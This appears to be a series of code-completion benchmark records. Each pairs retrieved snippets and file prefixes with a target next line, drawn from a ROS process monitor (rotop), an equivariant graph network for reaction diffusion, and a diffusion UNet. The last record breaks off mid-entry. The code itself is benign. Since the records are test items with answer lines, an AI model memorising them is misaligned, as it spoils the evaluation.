row_list.append(i)\n return row_list\n\n\n @staticmethod\n def get_col_range_command(process_info_header_line: str):\n start_col = process_info_header_line.find('COMMAND')\n end_col = len(process_info_header_line) - 1\n return (start_col, end_col)\n\n\n @staticmethod\n def get_col_range_PID(process_info_header_line: str):\n start_col = 0\n end_col = process_info_header_line.find('PID') + len('PID')\n return (start_col, end_col)\n\n\n @staticmethod\n def get_col_range_CPU(process_info_header_line: str):\n start_col = process_info_header_line.find('SHR S') + len('SHR S')\n end_col = process_info_header_line.find('%CPU') + len('%CPU')\n return (start_col, end_col)\n\n\n @staticmethod\n def get_col_range_MEM(process_info_header_line: str):\n start_col = process_info_header_line.find('%CPU') + len('%CPU')\n end_col = process_info_header_line.find('%MEM') + len('%MEM')\n return (start_col, end_col)\n\n\n @staticmethod\n def get_col_range_list_to_display(process_info_header_line: str, show_all=False):\n range_list = []\n\n if show_all:\n range_list.append((0, len(process_info_header_line)))\n else:\n start_col = 0\n end_col = process_info_header_line.find('PID') + len('PID')\n range_list.append((start_col, end_col))\n\n start_col = process_info_header_line.find('NI') + len('NI')\n end_col = process_info_header_line.find('%MEM') + len('%MEM')\n range_list.append((start_col, end_col))\n\n start_col = process_info_header_line.find('COMMAND') - 1\n end_col = len(process_info_header_line)\n range_list.append((start_col, end_col))\n\n return range_list\n\n\n @staticmethod\n def parse_component_container_command(command):\n cmd = command.split()[0].split('/')[-1]\n idx_node = command.find('__node')\n if idx_node > 0:\n node = command[idx_node:].split()[0].split('=')[-1]\n cmd = node\n idx_ns = command.find('__ns')\n if idx_ns > 0:\n ns = command[idx_ns:].split()[0].split('=')[-1]\n # cmd = cmd + ', ' + node + ', ' + ns\n cmd += ', ' + ns\n return cmd\n\n\n @staticmethod\n def parse_python_command(command):\n cmd_list = command.split()\n cmd = cmd_list[0].split('/')[-1]\n if len(cmd_list) > 1:\n if cmd_list[1][0] == '-':\n python_file = cmd_list[-1]\n else:\n python_file = cmd_list[1]\n python_file = python_file.split('/')[-1]\n\n ros2_option = ''\n if 'ros2' == python_file:\n ros2_option = ' '.join(cmd_list[2:5])\n\n cmd = cmd + ' ' + python_file + ' ' + ros2_option\n return cmd\n\n\n @staticmethod\n def parse_command_str(command):\n param_for_ros2 = ['__node', '__ns']\n if '[' == command[0]:\n # kernel process\n command = command\n elif any(item in command for item in param_for_ros2):\n command = TopRunner.parse_component_container_command(command)\n elif 'python' in command:\n command = TopRunner.parse_python_command(command)\n else:\n # normal process\n command = command.split()[0].split('/')[-1]\n return command"
},
{
"identifier": "gui_main",
"path": "src/rotop/gui_main.py",
"snippet": "def gui_main(args):\n global g_reset_history_df\n top_runner = TopRunner(args.interval, args.filter)\n data_container = DataContainer(args.csv)\n\n view = GuiView()\n gui_thread = threading.Thread(target=gui_loop, args=(view,))\n gui_thread.start()\n\n try:\n while True:\n if g_reset_history_df:\n data_container.reset_history()\n g_reset_history_df = False\n\n result_lines, result_show_all_lines = top_runner.run(args.num_process, True, args.only_ros)\n if result_show_all_lines is None:\n time.sleep(0.1)\n continue\n\n df_cpu_history, df_mem_history = data_container.run(top_runner, result_show_all_lines, args.num_process)\n df_cpu_history = df_cpu_history.iloc[:, :min(args.num_process, len(df_cpu_history.columns))]\n df_mem_history = df_mem_history.iloc[:, :min(args.num_process, len(df_mem_history.columns))]\n\n if gui_thread.is_alive():\n view.update_gui(result_lines, df_cpu_history, df_mem_history)\n else:\n break\n\n except KeyboardInterrupt:\n pass\n\n view.exit()\n gui_thread.join()"
},
{
"identifier": "create_logger",
"path": "src/rotop/utility.py",
"snippet": "def create_logger(name, level: int=logging.DEBUG, log_filename: str=None) -> logging.Logger:\n handler_format = logging.Formatter('[%(asctime)s][%(levelname)-7s][%(filename)s:%(lineno)s] %(message)s')\n # stream_handler = logging .StreamHandler()\n # stream_handler.setLevel(level)\n # stream_handler.setFormatter(handler_format)\n logger = logging.getLogger(name)\n logger.propagate = False\n logger.setLevel(level)\n # logger.addHandler(stream_handler)\n # if log_filename:\n # file_handler = logging.FileHandler(log_filename)\n # file_handler.setLevel(level)\n # file_handler.setFormatter(handler_format)\n # logger.addHandler(file_handler)\n return logger"
}
] | import argparse
import curses
import time
from .data_container import DataContainer
from .top_runner import TopRunner
from .gui_main import gui_main
from .utility import create_logger
from ._version import version
from .version_dummy import version | 3,440 | # Copyright 2023 iwatake2222
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import annotations
try:
except:
| # Copyright 2023 iwatake2222
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import annotations
try:
except:
| logger = create_logger(__name__, log_filename='rotop.log') | 3 | 2023-10-30 22:21:05+00:00 | 4k |
chenruduan/OAReactDiff | oa_reactdiff/dynamics/egnn_dynamics.py | [
{
"identifier": "EGNN",
"path": "oa_reactdiff/model/egnn.py",
"snippet": "class EGNN(nn.Module):\n def __init__(\n self,\n in_node_nf: int = 8,\n in_edge_nf: int = 2,\n hidden_nf: int = 256,\n edge_hidden_nf: int = 32,\n act_fn: str = \"swish\",\n n_layers: int = 3,\n attention: int = False,\n out_node_nf: Optional[int] = None,\n tanh: bool = False,\n coords_range: float = 15.0,\n norm_constant: float = 1.0,\n inv_sublayers: int = 2,\n sin_embedding: bool = False,\n normalization_factor: float = 100.0,\n aggregation_method: str = \"sum\",\n reflect_equiv: bool = True,\n ):\n r\"\"\"_summary_\n\n Args:\n in_node_nf (int): number of input node feature. Defaults to 8.\n in_edge_nf (int): number of input edge feature. Defaults to 2.\n hidden_nf (int): number of hidden units. Defaults to 256.\n act_fn (str): activation function. Defaults to \"swish\".\n n_layers (int): number of equivariant update block. Defaults to 3.\n attention (int): whether to use self attention. Defaults to False.\n out_node_nf (Optional[int]): number of output node features.\n Defaults to None to set the same as in_node_nf\n coords_range (float): range factor, only used in tanh = True.\n Defaults to 15.0.\n norm_constant (float): distance normalizating factor. Defaults to 1.0.\n inv_sublayers (int): number of GCL in an equivariant update block.\n Defaults to 2.\n sin_embedding (Optional[nn.Module]): whether to use edge distance embedding.\n Defaults to None.\n normalization_factor (float): distance normalization used in coord2diff.\n Defaults to 1.0.\n aggregation_method (str): aggregation options in scattering.\n Defaults to \"sum\".\n reflect_equiv (bool): whether to ignore reflection.\n Defaults to True.\n \"\"\"\n super().__init__()\n if out_node_nf is None:\n out_node_nf = in_node_nf\n self.hidden_nf = hidden_nf\n self.edge_hidden_nf = edge_hidden_nf\n self.n_layers = n_layers\n self.coords_range_layer = float(coords_range / n_layers)\n self.normalization_factor = normalization_factor\n self.aggregation_method = aggregation_method\n self.reflect_equiv = reflect_equiv\n\n edge_feat_nf = in_edge_nf\n if sin_embedding:\n self.sin_embedding = SinusoidsEmbeddingNew()\n self.dist_dim = self.sin_embedding.dim\n else:\n self.sin_embedding = None\n self.dist_dim = 1\n\n self.edge_feat_nf = edge_feat_nf + self.dist_dim\n\n self.embedding = nn.Linear(in_node_nf, self.hidden_nf)\n self.embedding_out = nn.Linear(self.hidden_nf, out_node_nf)\n\n self.edge_embedding = nn.Linear(\n self.edge_feat_nf, self.hidden_nf - self.dist_dim\n )\n self.edge_embedding_out = nn.Linear(\n self.hidden_nf - self.dist_dim, self.edge_feat_nf\n )\n for i in range(0, n_layers):\n self.add_module(\n \"e_block_%d\" % i,\n EquivariantBlock(\n hidden_nf,\n edge_feat_nf=edge_feat_nf,\n act_fn=act_fn,\n n_layers=inv_sublayers,\n attention=attention,\n tanh=tanh,\n coords_range=coords_range,\n norm_constant=norm_constant,\n sin_embedding=self.sin_embedding,\n normalization_factor=normalization_factor,\n aggregation_method=aggregation_method,\n reflect_equiv=reflect_equiv,\n ),\n )\n\n def forward(\n self,\n h: Tensor,\n pos: Tensor,\n edge_index: Tensor,\n edge_attr: Optional[Tensor] = None,\n node_mask: Optional[Tensor] = None,\n edge_mask: Optional[Tensor] = None,\n update_coords_mask: Optional[Tensor] = None,\n subgraph_mask: Optional[Tensor] = None,\n ) -> Tuple[Tensor, Tensor, Tensor]:\n r\"\"\"\n\n Args:\n h (Tensor): [n_nodes, n_hidden], node features.\n pos (Tensor): [n_nodes, n_dim (3 in 3D space)], position tensor.\n edge_index (Tensor): [2, n_edge], edge index {ij}\n edge_attr (Optional[Tensor]): [n_edge, edge_feature_dim]. edge attributes.\n Defaults to None.\n node_mask (Optional[Tensor]): [n_node, 1], mask for node updates.\n Defaults to None.\n edge_mask (Optional[Tensor]): [n_edge, 1], mask for edge updates.\n Defaults to None.\n update_coords_mask (Optional[Tensor]): [n_node, 1], mask for position updates.\n Defaults to None.\n subgraph_mask (Optional[Tensor]): n_edge, 1], mask for positions aggregations.\n The idea is keep subgraph (i.e., fragment) level equivariance.\n Defaults to None.\n\n Returns:\n Tuple[Tensor, Tensor, Tensor]: updated h, pos, edge_attr\n \"\"\"\n # Edit Emiel: Remove velocity as input\n distances, _ = coord2diff(pos, edge_index)\n if subgraph_mask is not None:\n distances = distances * subgraph_mask\n\n if self.sin_embedding is not None:\n distances = self.sin_embedding(distances)\n if edge_attr is None or edge_attr.size(-1) == 0:\n edge_attr = distances\n else:\n edge_attr = torch.concat([distances, edge_attr], dim=-1)\n edge_attr = self.edge_embedding(edge_attr)\n h = self.embedding(h)\n # edge_index_ji = get_ji_bond_index(edge_index)\n # edge_attr = symmetrize_edge(edge_attr, edge_index_ji)\n\n for i in range(0, self.n_layers):\n h, pos, edge_attr = self._modules[\"e_block_%d\" % i](\n h,\n pos,\n edge_index,\n edge_attr=edge_attr,\n node_mask=node_mask,\n edge_mask=edge_mask,\n update_coords_mask=update_coords_mask,\n subgraph_mask=subgraph_mask,\n )\n\n # edge_attr = symmetrize_edge(edge_attr, edge_index_ji)\n\n # Important, the bias of the last linear might be non-zero\n h = self.embedding_out(h)\n edge_attr = self.edge_embedding_out(edge_attr)\n\n if node_mask is not None:\n h = h * node_mask\n if edge_mask is not None:\n edge_attr = edge_attr * edge_mask\n return h, pos, edge_attr"
},
{
"identifier": "get_subgraph_mask",
"path": "oa_reactdiff/utils/_graph_tools.py",
"snippet": "def get_subgraph_mask(edge_index: Tensor, n_frag_switch: Tensor) -> Tensor:\n r\"\"\"Filter out edges that have inter-fragment connections.\n Example:\n edge_index: [\n [0, 0, 1, 1, 2, 2],\n [1, 2, 0, 2, 0, 1],\n ]\n n_frag_switch: [0, 0, 1]\n -> [1, 0, 1, 0, 0, 0]\n\n Args:\n edge_index (Tensor): e_ij\n n_frag_switch (Tensor): fragment that a node belongs to\n\n Returns:\n Tensor: [n_edge], 1 for inner- and 0 for inter-fragment edge\n \"\"\"\n subgraph_mask = torch.zeros(edge_index.size(1)).long()\n in_same_frag = n_frag_switch[edge_index[0]] == n_frag_switch[edge_index[1]]\n subgraph_mask[torch.where(in_same_frag)] = 1\n return subgraph_mask.to(edge_index.device)"
},
{
"identifier": "BaseDynamics",
"path": "oa_reactdiff/dynamics/_base.py",
"snippet": "class BaseDynamics(nn.Module):\n def __init__(\n self,\n model_config: Dict,\n fragment_names: List[str],\n node_nfs: List[int],\n edge_nf: int,\n condition_nf: int = 0,\n pos_dim: int = 3,\n update_pocket_coords: bool = True,\n condition_time: bool = True,\n edge_cutoff: Optional[float] = None,\n model: nn.Module = EGNN,\n device: torch.device = torch.device(\"cuda\"),\n enforce_same_encoding: Optional[List] = None,\n source: Optional[Dict] = None,\n ) -> None:\n r\"\"\"Base dynamics class set up for denoising process.\n\n Args:\n model_config (Dict): config for the equivariant model.\n fragment_names (List[str]): list of names for fragments\n node_nfs (List[int]): list of number of input node attributues.\n edge_nf (int): number of input edge attributes.\n condition_nf (int): number of attributes for conditional generation.\n Defaults to 0.\n pos_dim (int): dimension for position vector. Defaults to 3.\n update_pocket_coords (bool): whether to update positions of everything.\n Defaults to True.\n condition_time (bool): whether to condition on time. Defaults to True.\n edge_cutoff (Optional[float]): cutoff for building intra-fragment edges.\n Defaults to None.\n model (Optional[nn.Module]): Module for equivariant model. Defaults to None.\n \"\"\"\n super().__init__()\n assert len(node_nfs) == len(fragment_names)\n for nf in node_nfs:\n assert nf > pos_dim\n if \"act_fn\" not in model_config:\n model_config[\"act_fn\"] = \"swish\"\n if \"in_node_nf\" not in model_config:\n model_config[\"in_node_nf\"] = model_config[\"in_hidden_channels\"]\n self.model_config = model_config\n self.node_nfs = node_nfs\n self.edge_nf = edge_nf\n self.condition_nf = condition_nf\n self.fragment_names = fragment_names\n self.pos_dim = pos_dim\n self.update_pocket_coords = update_pocket_coords\n self.condition_time = condition_time\n self.edge_cutoff = edge_cutoff\n self.device = device\n\n if model is None:\n model = EGNN\n self.model = model(**model_config)\n if source is not None:\n self.model.load_state_dict(source[\"model\"])\n self.dist_dim = self.model.dist_dim if hasattr(self.model, \"dist_dim\") else 0\n\n self.embed_dim = model_config[\"in_node_nf\"]\n self.edge_embed_dim = (\n model_config[\"in_edge_nf\"] if \"in_edge_nf\" in model_config else 0\n )\n if condition_time:\n self.embed_dim -= 1\n if condition_nf > 0:\n self.embed_dim -= condition_nf\n assert self.embed_dim > 0\n\n self.build_encoders_decoders(enforce_same_encoding, source)\n del source\n\n def build_encoders_decoders(\n self,\n enfoce_name_encoding: Optional[List] = None,\n source: Optional[Dict] = None,\n ):\n r\"\"\"Build encoders and decoders for nodes and edges.\"\"\"\n self.encoders = nn.ModuleList()\n self.decoders = nn.ModuleList()\n for ii, name in enumerate(self.fragment_names):\n self.encoders.append(\n MLP(\n in_dim=self.node_nfs[ii] - self.pos_dim,\n out_dims=[2 * (self.node_nfs[ii] - self.pos_dim), self.embed_dim],\n activation=self.model_config[\"act_fn\"],\n last_layer_no_activation=True,\n )\n )\n self.decoders.append(\n MLP(\n in_dim=self.embed_dim,\n out_dims=[\n 2 * (self.node_nfs[ii] - self.pos_dim),\n self.node_nfs[ii] - self.pos_dim,\n ],\n activation=self.model_config[\"act_fn\"],\n last_layer_no_activation=True,\n )\n )\n if enfoce_name_encoding is not None:\n for ii in enfoce_name_encoding:\n self.encoders[ii] = self.encoders[0]\n self.decoders[ii] = self.decoders[0]\n if source is not None:\n self.encoders.load_state_dict(source[\"encoders\"])\n self.decoders.load_state_dict(source[\"decoders\"])\n\n if self.edge_embed_dim > 0:\n self.edge_encoder = MLP(\n in_dim=self.edge_nf,\n out_dims=[2 * self.edge_nf, self.edge_embed_dim],\n activation=self.model_config[\"act_fn\"],\n last_layer_no_activation=True,\n )\n self.edge_decoder = MLP(\n in_dim=self.edge_embed_dim + self.dist_dim,\n out_dims=[2 * self.edge_nf, self.edge_nf],\n activation=self.model_config[\"act_fn\"],\n last_layer_no_activation=True,\n )\n else:\n self.edge_encoder, self.edge_decoder = None, None\n\n def forward(self):\n raise NotImplementedError"
}
] | from typing import Dict, List, Optional, Tuple
from torch import nn, Tensor
from torch_scatter import scatter_mean
from oa_reactdiff.model import EGNN
from oa_reactdiff.utils._graph_tools import get_subgraph_mask
from ._base import BaseDynamics
import numpy as np
import torch | 3,293 |
class EGNNDynamics(BaseDynamics):
def __init__(
self,
model_config: Dict,
fragment_names: List[str],
node_nfs: List[int],
edge_nf: int,
condition_nf: int = 0,
pos_dim: int = 3,
update_pocket_coords: bool = True,
condition_time: bool = True,
edge_cutoff: Optional[float] = None,
|
class EGNNDynamics(BaseDynamics):
def __init__(
self,
model_config: Dict,
fragment_names: List[str],
node_nfs: List[int],
edge_nf: int,
condition_nf: int = 0,
pos_dim: int = 3,
update_pocket_coords: bool = True,
condition_time: bool = True,
edge_cutoff: Optional[float] = None, | model: nn.Module = EGNN, | 0 | 2023-10-30 02:53:38+00:00 | 4k |
lewandofskee/DiAD | ldm/modules/diffusionmodules/openaimodel.py | [
{
"identifier": "checkpoint",
"path": "ldm/modules/diffusionmodules/util.py",
"snippet": "def checkpoint(func, inputs, params, flag):\n \"\"\"\n Evaluate a function without caching intermediate activations, allowing for\n reduced memory at the expense of extra compute in the backward pass.\n :param func: the function to evaluate.\n :param inputs: the argument sequence to pass to `func`.\n :param params: a sequence of parameters `func` depends on but does not\n explicitly take as arguments.\n :param flag: if False, disable gradient checkpointing.\n \"\"\"\n if flag:\n args = tuple(inputs) + tuple(params)\n return CheckpointFunction.apply(func, len(inputs), *args)\n else:\n return func(*inputs)"
},
{
"identifier": "conv_nd",
"path": "ldm/modules/diffusionmodules/util.py",
"snippet": "def conv_nd(dims, *args, **kwargs):\n \"\"\"\n Create a 1D, 2D, or 3D convolution module.\n \"\"\"\n if dims == 1:\n return nn.Conv1d(*args, **kwargs)\n elif dims == 2:\n return nn.Conv2d(*args, **kwargs)\n elif dims == 3:\n return nn.Conv3d(*args, **kwargs)\n raise ValueError(f\"unsupported dimensions: {dims}\")"
},
{
"identifier": "linear",
"path": "ldm/modules/diffusionmodules/util.py",
"snippet": "def linear(*args, **kwargs):\n \"\"\"\n Create a linear module.\n \"\"\"\n return nn.Linear(*args, **kwargs)"
},
{
"identifier": "avg_pool_nd",
"path": "ldm/modules/diffusionmodules/util.py",
"snippet": "def avg_pool_nd(dims, *args, **kwargs):\n \"\"\"\n Create a 1D, 2D, or 3D average pooling module.\n \"\"\"\n if dims == 1:\n return nn.AvgPool1d(*args, **kwargs)\n elif dims == 2:\n return nn.AvgPool2d(*args, **kwargs)\n elif dims == 3:\n return nn.AvgPool3d(*args, **kwargs)\n raise ValueError(f\"unsupported dimensions: {dims}\")"
},
{
"identifier": "zero_module",
"path": "ldm/modules/diffusionmodules/util.py",
"snippet": "def zero_module(module):\n \"\"\"\n Zero out the parameters of a module and return it.\n \"\"\"\n for p in module.parameters():\n p.detach().zero_()\n return module"
},
{
"identifier": "normalization",
"path": "ldm/modules/diffusionmodules/util.py",
"snippet": "def normalization(channels):\n \"\"\"\n Make a standard normalization layer.\n :param channels: number of input channels.\n :return: an nn.Module for normalization.\n \"\"\"\n return GroupNorm32(32, channels)"
},
{
"identifier": "timestep_embedding",
"path": "ldm/modules/diffusionmodules/util.py",
"snippet": "def timestep_embedding(timesteps, dim, max_period=10000, repeat_only=False):\n \"\"\"\n Create sinusoidal timestep embeddings.\n :param timesteps: a 1-D Tensor of N indices, one per batch element.\n These may be fractional.\n :param dim: the dimension of the output.\n :param max_period: controls the minimum frequency of the embeddings.\n :return: an [N x dim] Tensor of positional embeddings.\n \"\"\"\n if not repeat_only:\n half = dim // 2\n freqs = torch.exp(\n -math.log(max_period) * torch.arange(start=0, end=half, dtype=torch.float32) / half\n ).to(device=timesteps.device)\n args = timesteps[:, None].float() * freqs[None]\n embedding = torch.cat([torch.cos(args), torch.sin(args)], dim=-1)\n if dim % 2:\n embedding = torch.cat([embedding, torch.zeros_like(embedding[:, :1])], dim=-1)\n else:\n embedding = repeat(timesteps, 'b -> b d', d=dim)\n return embedding"
},
{
"identifier": "SpatialTransformer",
"path": "ldm/modules/attention.py",
"snippet": "class SpatialTransformer(nn.Module):\n \"\"\"\n Transformer block for image-like data.\n First, project the input (aka embedding)\n and reshape to b, t, d.\n Then apply standard transformer action.\n Finally, reshape to image\n NEW: use_linear for more efficiency instead of the 1x1 convs\n \"\"\"\n def __init__(self, in_channels, n_heads, d_head,\n depth=1, dropout=0., context_dim=None,\n disable_self_attn=False, use_linear=False,\n use_checkpoint=True):\n super().__init__()\n if exists(context_dim) and not isinstance(context_dim, list):\n context_dim = [context_dim]\n self.in_channels = in_channels\n inner_dim = n_heads * d_head\n self.norm = Normalize(in_channels)\n if not use_linear:\n self.proj_in = nn.Conv2d(in_channels,\n inner_dim,\n kernel_size=1,\n stride=1,\n padding=0)\n else:\n self.proj_in = nn.Linear(in_channels, inner_dim)\n\n self.transformer_blocks = nn.ModuleList(\n [BasicTransformerBlock(inner_dim, n_heads, d_head, dropout=dropout, context_dim=context_dim[d],\n disable_self_attn=disable_self_attn, checkpoint=use_checkpoint)\n for d in range(depth)]\n )\n if not use_linear:\n self.proj_out = zero_module(nn.Conv2d(inner_dim,\n in_channels,\n kernel_size=1,\n stride=1,\n padding=0))\n else:\n self.proj_out = zero_module(nn.Linear(in_channels, inner_dim))\n self.use_linear = use_linear\n\n def forward(self, x, context=None):\n # note: if no context is given, cross-attention defaults to self-attention\n if not isinstance(context, list):\n context = [context]\n b, c, h, w = x.shape\n x_in = x\n x = self.norm(x)\n if not self.use_linear:\n x = self.proj_in(x)\n x = rearrange(x, 'b c h w -> b (h w) c').contiguous()\n if self.use_linear:\n x = self.proj_in(x)\n for i, block in enumerate(self.transformer_blocks):\n x = block(x, context=context[i])\n if self.use_linear:\n x = self.proj_out(x)\n x = rearrange(x, 'b (h w) c -> b c h w', h=h, w=w).contiguous()\n if not self.use_linear:\n x = self.proj_out(x)\n return x + x_in"
},
{
"identifier": "exists",
"path": "ldm/util.py",
"snippet": "def exists(x):\n return x is not None"
}
] | from abc import abstractmethod
from ldm.modules.diffusionmodules.util import (
checkpoint,
conv_nd,
linear,
avg_pool_nd,
zero_module,
normalization,
timestep_embedding,
)
from ldm.modules.attention import SpatialTransformer
from ldm.util import exists
from omegaconf.listconfig import ListConfig
import math
import numpy as np
import torch as th
import torch.nn as nn
import torch.nn.functional as F | 3,310 | x, (x.shape[2], x.shape[3] * 2, x.shape[4] * 2), mode="nearest"
)
else:
x = F.interpolate(x, scale_factor=2, mode="nearest")
# if self.scale_guide:
# x = F.interpolate(x, scale_factor=1.75, mode="nearest")
# else:
# x = F.interpolate(x, scale_factor=2, mode="nearest")
if self.use_conv:
x = self.conv(x)
return x
class TransposedUpsample(nn.Module):
'Learned 2x upsampling without padding'
def __init__(self, channels, out_channels=None, ks=5):
super().__init__()
self.channels = channels
self.out_channels = out_channels or channels
self.up = nn.ConvTranspose2d(self.channels,self.out_channels,kernel_size=ks,stride=2)
def forward(self,x):
return self.up(x)
class Downsample(nn.Module):
"""
A downsampling layer with an optional convolution.
:param channels: channels in the inputs and outputs.
:param use_conv: a bool determining if a convolution is applied.
:param dims: determines if the signal is 1D, 2D, or 3D. If 3D, then
downsampling occurs in the inner-two dimensions.
"""
def __init__(self, channels, use_conv, dims=2, out_channels=None,padding=1):
super().__init__()
self.channels = channels
self.out_channels = out_channels or channels
self.use_conv = use_conv
self.dims = dims
stride = 2 if dims != 3 else (1, 2, 2)
if use_conv:
self.op = conv_nd(
dims, self.channels, self.out_channels, 3, stride=stride, padding=padding
)
else:
assert self.channels == self.out_channels
self.op = avg_pool_nd(dims, kernel_size=stride, stride=stride)
def forward(self, x):
assert x.shape[1] == self.channels
return self.op(x)
class ResBlock(TimestepBlock):
"""
A residual block that can optionally change the number of channels.
:param channels: the number of input channels.
:param emb_channels: the number of timestep embedding channels.
:param dropout: the rate of dropout.
:param out_channels: if specified, the number of out channels.
:param use_conv: if True and out_channels is specified, use a spatial
convolution instead of a smaller 1x1 convolution to change the
channels in the skip connection.
:param dims: determines if the signal is 1D, 2D, or 3D.
:param use_checkpoint: if True, use gradient checkpointing on this module.
:param up: if True, use this block for upsampling.
:param down: if True, use this block for downsampling.
"""
def __init__(
self,
channels,
emb_channels,
dropout,
out_channels=None,
use_conv=False,
use_scale_shift_norm=False,
dims=2,
use_checkpoint=False,
up=False,
down=False,
):
super().__init__()
self.channels = channels
self.emb_channels = emb_channels
self.dropout = dropout
self.out_channels = out_channels or channels
self.use_conv = use_conv
self.use_checkpoint = use_checkpoint
self.use_scale_shift_norm = use_scale_shift_norm
self.in_layers = nn.Sequential(
normalization(channels),
nn.SiLU(),
conv_nd(dims, channels, self.out_channels, 3, padding=1),
)
self.updown = up or down
if up:
self.h_upd = Upsample(channels, False, dims)
self.x_upd = Upsample(channels, False, dims)
elif down:
self.h_upd = Downsample(channels, False, dims)
self.x_upd = Downsample(channels, False, dims)
else:
self.h_upd = self.x_upd = nn.Identity()
self.emb_layers = nn.Sequential(
nn.SiLU(),
linear(
emb_channels,
2 * self.out_channels if use_scale_shift_norm else self.out_channels,
),
)
self.out_layers = nn.Sequential(
normalization(self.out_channels),
nn.SiLU(),
nn.Dropout(p=dropout),
|
# dummy replace
def convert_module_to_f16(x):
pass
def convert_module_to_f32(x):
pass
## go
class AttentionPool2d(nn.Module):
"""
Adapted from CLIP: https://github.com/openai/CLIP/blob/main/clip/model.py
"""
def __init__(
self,
spacial_dim: int,
embed_dim: int,
num_heads_channels: int,
output_dim: int = None,
):
super().__init__()
self.positional_embedding = nn.Parameter(th.randn(embed_dim, spacial_dim ** 2 + 1) / embed_dim ** 0.5)
self.qkv_proj = conv_nd(1, embed_dim, 3 * embed_dim, 1)
self.c_proj = conv_nd(1, embed_dim, output_dim or embed_dim, 1)
self.num_heads = embed_dim // num_heads_channels
self.attention = QKVAttention(self.num_heads)
def forward(self, x):
b, c, *_spatial = x.shape
x = x.reshape(b, c, -1) # NC(HW)
x = th.cat([x.mean(dim=-1, keepdim=True), x], dim=-1) # NC(HW+1)
x = x + self.positional_embedding[None, :, :].to(x.dtype) # NC(HW+1)
x = self.qkv_proj(x)
x = self.attention(x)
x = self.c_proj(x)
return x[:, :, 0]
class TimestepBlock(nn.Module):
"""
Any module where forward() takes timestep embeddings as a second argument.
"""
@abstractmethod
def forward(self, x, emb):
"""
Apply the module to `x` given `emb` timestep embeddings.
"""
class TimestepEmbedSequential(nn.Sequential, TimestepBlock):
"""
A sequential module that passes timestep embeddings to the children that
support it as an extra input.
"""
def forward(self, x, emb, context=None):
for layer in self:
if isinstance(layer, TimestepBlock):
x = layer(x, emb)
elif isinstance(layer, SpatialTransformer):
x = layer(x, context)
else:
x = layer(x)
return x
class Upsample(nn.Module):
"""
An upsampling layer with an optional convolution.
:param channels: channels in the inputs and outputs.
:param use_conv: a bool determining if a convolution is applied.
:param dims: determines if the signal is 1D, 2D, or 3D. If 3D, then
upsampling occurs in the inner-two dimensions.
"""
def __init__(self, channels, use_conv, dims=2, out_channels=None, padding=1, scale_guide=False):
super().__init__()
self.channels = channels
self.out_channels = out_channels or channels
self.use_conv = use_conv
self.dims = dims
self.scale_guide = scale_guide
if use_conv:
self.conv = conv_nd(dims, self.channels, self.out_channels, 3, padding=padding)
def forward(self, x):
assert x.shape[1] == self.channels
if self.dims == 3:
x = F.interpolate(
x, (x.shape[2], x.shape[3] * 2, x.shape[4] * 2), mode="nearest"
)
else:
x = F.interpolate(x, scale_factor=2, mode="nearest")
# if self.scale_guide:
# x = F.interpolate(x, scale_factor=1.75, mode="nearest")
# else:
# x = F.interpolate(x, scale_factor=2, mode="nearest")
if self.use_conv:
x = self.conv(x)
return x
class TransposedUpsample(nn.Module):
'Learned 2x upsampling without padding'
def __init__(self, channels, out_channels=None, ks=5):
super().__init__()
self.channels = channels
self.out_channels = out_channels or channels
self.up = nn.ConvTranspose2d(self.channels,self.out_channels,kernel_size=ks,stride=2)
def forward(self,x):
return self.up(x)
class Downsample(nn.Module):
"""
A downsampling layer with an optional convolution.
:param channels: channels in the inputs and outputs.
:param use_conv: a bool determining if a convolution is applied.
:param dims: determines if the signal is 1D, 2D, or 3D. If 3D, then
downsampling occurs in the inner-two dimensions.
"""
def __init__(self, channels, use_conv, dims=2, out_channels=None,padding=1):
super().__init__()
self.channels = channels
self.out_channels = out_channels or channels
self.use_conv = use_conv
self.dims = dims
stride = 2 if dims != 3 else (1, 2, 2)
if use_conv:
self.op = conv_nd(
dims, self.channels, self.out_channels, 3, stride=stride, padding=padding
)
else:
assert self.channels == self.out_channels
self.op = avg_pool_nd(dims, kernel_size=stride, stride=stride)
def forward(self, x):
assert x.shape[1] == self.channels
return self.op(x)
class ResBlock(TimestepBlock):
"""
A residual block that can optionally change the number of channels.
:param channels: the number of input channels.
:param emb_channels: the number of timestep embedding channels.
:param dropout: the rate of dropout.
:param out_channels: if specified, the number of out channels.
:param use_conv: if True and out_channels is specified, use a spatial
convolution instead of a smaller 1x1 convolution to change the
channels in the skip connection.
:param dims: determines if the signal is 1D, 2D, or 3D.
:param use_checkpoint: if True, use gradient checkpointing on this module.
:param up: if True, use this block for upsampling.
:param down: if True, use this block for downsampling.
"""
def __init__(
self,
channels,
emb_channels,
dropout,
out_channels=None,
use_conv=False,
use_scale_shift_norm=False,
dims=2,
use_checkpoint=False,
up=False,
down=False,
):
super().__init__()
self.channels = channels
self.emb_channels = emb_channels
self.dropout = dropout
self.out_channels = out_channels or channels
self.use_conv = use_conv
self.use_checkpoint = use_checkpoint
self.use_scale_shift_norm = use_scale_shift_norm
self.in_layers = nn.Sequential(
normalization(channels),
nn.SiLU(),
conv_nd(dims, channels, self.out_channels, 3, padding=1),
)
self.updown = up or down
if up:
self.h_upd = Upsample(channels, False, dims)
self.x_upd = Upsample(channels, False, dims)
elif down:
self.h_upd = Downsample(channels, False, dims)
self.x_upd = Downsample(channels, False, dims)
else:
self.h_upd = self.x_upd = nn.Identity()
self.emb_layers = nn.Sequential(
nn.SiLU(),
linear(
emb_channels,
2 * self.out_channels if use_scale_shift_norm else self.out_channels,
),
)
self.out_layers = nn.Sequential(
normalization(self.out_channels),
nn.SiLU(),
nn.Dropout(p=dropout), | zero_module( | 4 | 2023-10-30 14:21:09+00:00 | 4k |
nv-tlabs/trace | tbsim/datasets/factory.py | [
{
"identifier": "translate_pass_trajdata_cfg",
"path": "tbsim/utils/config_utils.py",
